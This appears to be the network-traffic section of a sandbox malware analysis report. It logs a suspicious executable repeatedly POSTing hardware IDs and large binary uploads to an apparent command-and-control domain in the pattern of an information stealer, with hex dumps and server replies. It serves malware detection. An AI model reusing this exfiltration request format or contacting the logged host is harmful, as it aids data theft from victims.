                                                                                                        2024-12-27 12:11:10 UTC1369INData Raw: 44 2b 37 69 55 55 54 50 32 79 72 6f 35 74 44 51 6f 49 74 4d 4f 44 37 56 42 30 32 2b 69 65 59 52 51 38 50 6c 4f 5a 30 68 37 69 6f 6e 77 2f 38 4d 55 63 4c 2b 4a 76 43 76 39 59 47 63 45 32 68 63 4a 36 51 6d 53 63 65 64 74 79 46 66 78 74 42 77 6d 51 58 79 44 6a 76 72 37 77 78 49 69 38 4d 2b 70 4d 37 41 79 4e 53 2f 63 47 51 69 2f 58 74 46 6f 72 33 2b 45 51 76 54 30 52 32 30 42 4f 4d 61 44 37 37 69 55 55 52 50 6d 33 37 45 30 73 53 34 73 4a 4e 51 4b 43 4b 49 54 6e 43 36 34 63 35 6b 51 70 65 4a 55 63 55 5a 70 79 4a 32 33 2f 38 42 52 61 4c 48 50 73 6a 57 36 50 69 6b 33 30 68 6f 4b 76 56 72 62 61 71 46 33 69 46 54 35 38 30 46 6c 54 58 32 42 68 2f 6a 38 78 52 38 35 2f 6f 6e 31 63 37 6f 67 5a 33 32 58 50 52 36 78 58 39 38 75 74 6a 71 52 45 50 72 34 42 44 34 42 65 6f
                                                                                                        Data Ascii: D+7iUUTP2yro5tDQoItMOD7VB02+ieYRQ8PlOZ0h7ionw/8MUcL+JvCv9YGcE2hcJ6QmScedtyFfxtBwmQXyDjvr7wxIi8M+pM7AyNS/cGQi/XtFor3+EQvT0R20BOMaD77iUURPm37E0sS4sJNQKCKITnC64c5kQpeJUcUZpyJ23/8BRaLHPsjW6Pik30hoKvVrbaqF3iFT580FlTX2Bh/j8xR85/on1c7ogZ32XPR6xX98utjqREPr4BD4Beo
                                                                                                        2024-12-27 12:11:10 UTC265INData Raw: 32 68 51 33 35 34 75 4f 4d 4c 4d 32 49 44 4f 58 41 7a 72 38 45 39 31 30 36 53 79 78 53 62 33 7a 53 43 59 5a 4e 70 4f 44 39 2f 2f 57 42 7a 66 39 32 4c 41 2b 73 52 6f 6f 49 73 45 66 43 72 46 43 32 79 4b 69 65 63 67 65 76 66 4e 63 4a 68 6b 32 71 59 50 68 2b 2b 4d 53 49 66 69 4a 39 58 4f 36 4c 6d 64 39 6c 79 4a 46 6f 46 44 43 62 61 5a 6c 74 68 43 6c 37 58 6f 6d 53 6d 43 42 6c 50 54 75 78 78 77 38 34 50 66 37 61 2b 6c 71 64 58 65 46 54 68 72 79 54 4f 30 67 36 58 58 49 43 4d 54 74 42 48 41 42 4c 74 54 4b 74 2b 71 4d 53 58 43 32 79 71 6b 68 75 7a 73 78 4a 70 41 69 4f 35 56 46 32 47 6d 35 63 35 39 66 76 62 6f 45 61 51 45 75 76 38 54 2b 2f 39 63 41 4a 76 7a 5a 76 48 4f 43 64 6d 63 39 6c 30 52 46 68 31 44 63 59 4b 35 69 6d 52 33 61 34 6b 35 68 55 58 47 52 69 37 65
                                                                                                        Data Ascii: 2hQ354uOMLM2IDOXAzr8E9106SyxSb3zSCYZNpOD9//WBzf92LA+sRooIsEfCrFC2yKiecgevfNcJhk2qYPh++MSIfiJ9XO6Lmd9lyJFoFDCbaZlthCl7XomSmCBlPTuxxw84Pf7a+lqdXeFThryTO0g6XXICMTtBHABLtTKt+qMSXC2yqkhuzsxJpAiO5VF2Gm5c59fvboEaQEuv8T+/9cAJvzZvHOCdmc9l0RFh1DcYK5imR3a4k5hUXGRi7e
                                                                                                        2024-12-27 12:11:10 UTC1369INData Raw: 32 63 36 35 0d 0a 31 63 37 6b 70 5a 33 32 48 54 6c 37 6e 41 49 55 2b 2b 32 76 47 53 62 33 69 42 44 34 54 4f 4d 61 57 74 36 43 4d 56 6a 50 6a 32 37 30 77 71 7a 74 67 47 2b 6b 37 48 37 39 56 78 58 2b 58 53 6f 39 4b 38 50 4a 54 64 77 31 6a 68 59 72 35 2f 39 70 52 66 72 48 47 2b 32 75 45 65 47 39 6c 36 46 4a 46 71 68 4f 4b 4c 70 78 33 68 6c 37 36 34 6c 55 72 5a 6d 79 4c 67 75 44 70 6a 46 39 77 39 34 6e 6a 59 2f 4e 34 49 7a 53 58 52 46 58 67 43 49 63 39 2f 69 54 61 54 37 50 74 42 48 41 42 4c 74 54 4b 74 2b 71 4d 53 58 43 32 79 71 6b 68 75 7a 73 78 4a 70 41 69 4f 35 78 55 31 47 75 75 5a 4d 70 2b 39 75 42 44 4a 67 38 32 69 63 53 76 77 59 78 5a 63 4d 36 48 2b 79 76 39 59 47 63 51 31 42 49 4c 74 55 58 44 49 34 64 7a 6a 6c 58 36 35 41 5a 49 53 6d 4b 42 78 4c 6d 34
                                                                                                        Data Ascii: 2c651c7kpZ32HTl7nAIU++2vGSb3iBD4TOMaWt6CMVjPj270wqztgG+k7H79VxX+XSo9K8PJTdw1jhYr5/9pRfrHG+2uEeG9l6FJFqhOKLpx3hl764lUrZmyLguDpjF9w94njY/N4IzSXRFXgCIc9/iTaT7PtBHABLtTKt+qMSXC2yqkhuzsxJpAiO5xU1GuuZMp+9uBDJg82icSvwYxZcM6H+yv9YGcQ1BILtUXDI4dzjlX65AZISmKBxLm4
                                                                                                        2024-12-27 12:11:10 UTC1369INData Raw: 47 4f 75 43 47 76 50 69 51 7a 31 46 73 37 6a 48 54 63 61 61 68 69 6d 45 66 79 75 32 70 51 59 45 69 34 6b 66 54 32 77 68 59 6d 34 49 6e 31 63 37 4a 34 66 78 79 58 56 45 57 4e 48 5a 4a 32 36 53 7a 49 5a 66 37 36 53 6d 46 58 5a 38 75 6a 2b 66 2f 4e 42 79 44 6d 78 76 51 64 69 78 6c 6e 61 35 63 61 52 65 6f 42 6e 43 36 74 5a 63 67 49 72 61 59 66 4d 78 49 68 31 74 62 6f 74 74 56 52 4a 72 47 52 36 58 33 39 4b 6d 64 39 6c 31 73 47 6f 45 48 55 62 62 39 33 7a 32 37 44 30 30 70 68 51 47 43 57 69 66 76 5a 7a 77 41 36 7a 2f 65 75 4d 4c 4d 32 49 44 50 47 58 45 76 79 58 4a 49 32 6b 44 54 41 45 4d 4b 36 42 48 34 42 4c 73 61 78 39 50 62 43 46 69 62 67 68 4a 77 39 75 6a 6b 78 4e 64 6f 51 4a 4c 46 43 32 43 37 6e 4e 49 34 51 70 61 59 4b 4a 6b 56 6e 78 74 79 6e 71 70 64 45 59
                                                                                                        Data Ascii: GOuCGvPiQz1Fs7jHTcaahimEfyu2pQYEi4kfT2whYm4In1c7J4fxyXVEWNHZJ26SzIZf76SmFXZ8uj+f/NByDmxvQdixlna5caReoBnC6tZcgIraYfMxIh1tbottVRJrGR6X39Kmd9l1sGoEHUbb93z27D00phQGCWifvZzwA6z/euMLM2IDPGXEvyXJI2kDTAEMK6BH4BLsax9PbCFibghJw9ujkxNdoQJLFC2C7nNI4QpaYKJkVnxtynqpdEY


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.549708172.67.216.2364436396C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-27 12:11:12 UTC271OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=UP3JMVGJ
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 12770
                                                                                                        Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:12 UTC12770OUTData Raw: 2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 55 50 33 4a 4d 56 47 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20
                                                                                                        Data Ascii: --UP3JMVGJContent-Disposition: form-data; name="hwid"FE2FA5131359532BBEBA0C6A975F1733--UP3JMVGJContent-Disposition: form-data; name="pid"2--UP3JMVGJContent-Disposition: form-data; name="lid"nbYRKl----UP3JMVGJContent-Disposition:
                                                                                                        2024-12-27 12:11:12 UTC1127INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 27 Dec 2024 12:11:12 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=n016esk58o7ffhivdtpdaemcpk; expires=Tue, 22 Apr 2025 05:57:51 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6HTXH0abNMl3uKHZDf6v8uQDjk2xGYLZDpOkc8kEoXt%2FAqds4jzyEjEEcml0MdMIRom8cujlNwNWYHLFW5Y5J1dYnxLfgGIhXdOMCjHBgpNS8gPAHffck%2FyLF%2FwTWPFzTTI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f893639182bde96-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1511&min_rtt=1506&rtt_var=568&sent=11&recv=18&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13699&delivery_rate=1938911&cwnd=224&unsent_bytes=0&cid=354f3eb2eb925736&ts=864&x=0"
                                                                                                        2024-12-27 12:11:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2024-12-27 12:11:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.549713172.67.216.2364436396C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-27 12:11:15 UTC275OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=VSOVDR18VE0E
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 15036
                                                                                                        Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:15 UTC15036OUTData Raw: 2d 2d 56 53 4f 56 44 52 31 38 56 45 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 56 53 4f 56 44 52 31 38 56 45 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 53 4f 56 44 52 31 38 56 45 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 56 53 4f 56 44 52 31 38 56 45 30 45 0d 0a 43 6f 6e 74 65
                                                                                                        Data Ascii: --VSOVDR18VE0EContent-Disposition: form-data; name="hwid"FE2FA5131359532BBEBA0C6A975F1733--VSOVDR18VE0EContent-Disposition: form-data; name="pid"2--VSOVDR18VE0EContent-Disposition: form-data; name="lid"nbYRKl----VSOVDR18VE0EConte
                                                                                                        2024-12-27 12:11:15 UTC1135INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 27 Dec 2024 12:11:15 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=lhfp8p0cinmu07ilbug01apc2q; expires=Tue, 22 Apr 2025 05:57:54 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hn8I05VPAstQzFv1uMOUE%2BtpjMeob%2F%2FmOlSz3dCby%2BGmdRN2i%2BvFGQH54oChdK7smYCjkL1wTOEappDFlcOrq%2FVbpBxfQ10koE5PhtGYiRzasEwIrmVtOQ4i%2BwqQ5dRpBpI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f89364c2c2f4393-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2467&min_rtt=2464&rtt_var=931&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2835&recv_bytes=15969&delivery_rate=1170340&cwnd=201&unsent_bytes=0&cid=bcae1d94878753b2&ts=854&x=0"
                                                                                                        2024-12-27 12:11:15 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2024-12-27 12:11:15 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.549715172.67.216.2364436396C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-27 12:11:17 UTC278OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=6UO45FHKF17435X
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 20544
                                                                                                        Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:17 UTC15331OUTData Raw: 2d 2d 36 55 4f 34 35 46 48 4b 46 31 37 34 33 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 36 55 4f 34 35 46 48 4b 46 31 37 34 33 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 36 55 4f 34 35 46 48 4b 46 31 37 34 33 35 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 36 55 4f 34 35 46 48 4b 46 31
                                                                                                        Data Ascii: --6UO45FHKF17435XContent-Disposition: form-data; name="hwid"FE2FA5131359532BBEBA0C6A975F1733--6UO45FHKF17435XContent-Disposition: form-data; name="pid"3--6UO45FHKF17435XContent-Disposition: form-data; name="lid"nbYRKl----6UO45FHKF1
                                                                                                        2024-12-27 12:11:17 UTC5213OUTData Raw: 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: F3Wun 4F([:7s~X`nO`i
                                                                                                        2024-12-27 12:11:18 UTC1123INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 27 Dec 2024 12:11:18 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=4gqjrjtpudqoaatd2fl9cf64h0; expires=Tue, 22 Apr 2025 05:57:56 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4dn7qeflgbyy7lWrdqewUHUQloru%2BLiiWHrMgRlWMNrCc992vomXUtiajxHelsSHZhtHNYWiF34fr4X1zd3TiOtQV08BJEk4alKdmtrWMI9Fetuoh7vlGWx11hFtzAyr62c%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f89365a6ce443f4-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1736&min_rtt=1720&rtt_var=677&sent=16&recv=27&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21502&delivery_rate=1579232&cwnd=194&unsent_bytes=0&cid=85670865a3dfbfda&ts=995&x=0"
                                                                                                        2024-12-27 12:11:18 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2024-12-27 12:11:18 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.549725172.67.216.2364436396C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-27 12:11:19 UTC275OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=2MG8UBTKWIZSJ
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 1260
                                                                                                        Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:19 UTC1260OUTData Raw: 2d 2d 32 4d 47 38 55 42 54 4b 57 49 5a 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 32 4d 47 38 55 42 54 4b 57 49 5a 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 4d 47 38 55 42 54 4b 57 49 5a 53 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 32 4d 47 38 55 42 54 4b 57 49 5a 53 4a 0d 0a 43
                                                                                                        Data Ascii: --2MG8UBTKWIZSJContent-Disposition: form-data; name="hwid"FE2FA5131359532BBEBA0C6A975F1733--2MG8UBTKWIZSJContent-Disposition: form-data; name="pid"1--2MG8UBTKWIZSJContent-Disposition: form-data; name="lid"nbYRKl----2MG8UBTKWIZSJC
                                                                                                        2024-12-27 12:11:20 UTC1122INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 27 Dec 2024 12:11:20 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=gtqo51ip7n3cjra9vbucnq0jrj; expires=Tue, 22 Apr 2025 05:57:59 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8T8t7n2yyYM1OhXnQbg5xRmgQ0qQjJDXLdfoCul0iSxcKn9ydGxP9q7rzJtOM2lajJqjGmBej5l0HqvvESlB5SEWuNK73bNMGPsNVPrnXG6h%2BACe6xU%2FxBE5krhKj5RAfOE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f89366aebecde9b-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1476&min_rtt=1467&rtt_var=570&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=2171&delivery_rate=1888745&cwnd=192&unsent_bytes=0&cid=3b4235627bd7ed3e&ts=771&x=0"
                                                                                                        2024-12-27 12:11:20 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2024-12-27 12:11:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        8192.168.2.549733172.67.216.2364436396C:\nhrhvnf\ghhqoznpon_638708802577261661.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-27 12:11:22 UTC276OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=97FF7KQWH025
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 588978
                                                                                                        Host: hummskitnj.buzz
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 2d 2d 39 37 46 46 37 4b 51 57 48 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 45 32 46 41 35 31 33 31 33 35 39 35 33 32 42 42 45 42 41 30 43 36 41 39 37 35 46 31 37 33 33 0d 0a 2d 2d 39 37 46 46 37 4b 51 57 48 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 39 37 46 46 37 4b 51 57 48 30 32 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6e 62 59 52 4b 6c 2d 2d 0d 0a 2d 2d 39 37 46 46 37 4b 51 57 48 30 32 35 0d 0a 43 6f 6e 74 65
                                                                                                        Data Ascii: --97FF7KQWH025Content-Disposition: form-data; name="hwid"FE2FA5131359532BBEBA0C6A975F1733--97FF7KQWH025Content-Disposition: form-data; name="pid"1--97FF7KQWH025Content-Disposition: form-data; name="lid"nbYRKl----97FF7KQWH025Conte
                                                                                                        2024-12-27 12:11:22 UTC15331OUTData Raw: 84 5d 9a 18 1d 41 5d db ae 9e a0 ba 7a 42 2c d1 ad dc ff 59 85 ea 17 80 f1 be 0d cc e0 c0 3d 53 5a 2e 07 b0 fb 85 c1 36 96 51 ad 09 1a eb 9d c0 ce a3 fa 6c 43 f1 76 52 6f a9 46 c3 9b 78 e3 93 ed 36 10 eb 80 34 e2 27 ec 93 d2 9c 3c 70 a0 f1 d7 96 9d 29 3a 66 db 73 a7 12 48 5e 15 a6 6d db 2a d2 a2 fb 71 3f a6 84 c5 7d 32 61 8b 74 4a 33 ce f3 a0 e8 91 f3 a4 cc c5 09 55 fe a4 76 3c ad f2 a8 9c e6 10 2c db 53 04 6c dc f8 3f 8b 8a 31 85 a7 31 b3 d4 d4 cd 46 7f 57 05 4e dd 79 12 8f bc a2 50 dd b8 98 ee 5d ae 21 48 21 d3 db 11 11 b9 21 bd d2 15 08 1b 6c cb 7f 1c 66 84 85 7d 7f 41 6b 9b 99 4a 26 8f 2d 82 8b 14 ec 20 ca 58 5d cd e7 a4 cf fc 31 13 f7 54 e3 b3 91 fe e7 9a 92 23 8e 86 85 f6 e3 8e ef a6 a3 12 8b cc 3f 7f ce dc 29 5f b0 0e 6b 4d 66 b2 ad 6b e8 1b b9 81
                                                                                                        Data Ascii: ]A]zB,Y=SZ.6QlCvRoFx64'<p):fsH^m*q?}2atJ3Uv<,Sl?11FWNyP]!H!!lf}AkJ&- X]1T#?)_kMfk
